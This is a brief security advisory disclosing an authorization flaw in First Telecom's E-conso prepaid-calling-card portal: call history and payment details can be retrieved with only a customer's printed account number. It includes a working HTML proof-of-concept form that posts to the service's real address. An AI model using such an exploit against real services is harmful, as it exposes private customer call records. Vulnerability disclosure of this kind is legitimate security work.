COMMAND

    E-conso

SYSTEMS AFFECTED

    First Telecom E-conso

PROBLEM

    Thomas  Quinot  found  following.   First  Telecom, a company that
    provides a pre-paid  calling card service  in France, Germany  and
    the United Kingdom, offers  a service called E-conso  which allows
    subscribers  to  check  the  current  balance of their account and
    peruse the history of all calls they made through First Telecom.

    The WWW form  at the home  page of the  service requires entry  of
    the  account  number  (which  is  printed  on  all  First  Telecom
    documents  and  embossed  on  the  plastic membership card sent to
    every subscriber), as  well as a  password chosen by  the customer
    during the sign-up procedure.

    The submission  of this  form returns  a page  which includes  the
    customer's name and address, and  a form (with a /fixed/  "action"
    URL) which contains  the customer's account  number as a  "hidden"
    field.  Submission of this  form returns the details of  payements
    or the call history, depending  on which button is clicked  by the
    customer.   No hidden  field and  no cookie  is used  to pass  any
    client credentials back to the server.  Which means it is  trivial
    to retrieve  the details  of past  payements as  well as  the call
    history of a First Telecom customer knowing only her  (non-secret)
    account number.

    The HTML code included demonstrates this important flaw:

    <html>
    
    <head>
    <title>First Telecom e-conso exploit</title>
    </head>
    
    <body>
    <form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST">
     <p>
    Account number: <input type="text" name="cmaster" value="0000000">
    <input type="submit" name="cmdcdr" value="Details of calls">
    <input type="submit" name="cmdpaymenthistory" value="Details of payements">
    
    </body>
    </html>

SOLUTION

    Nothing yet.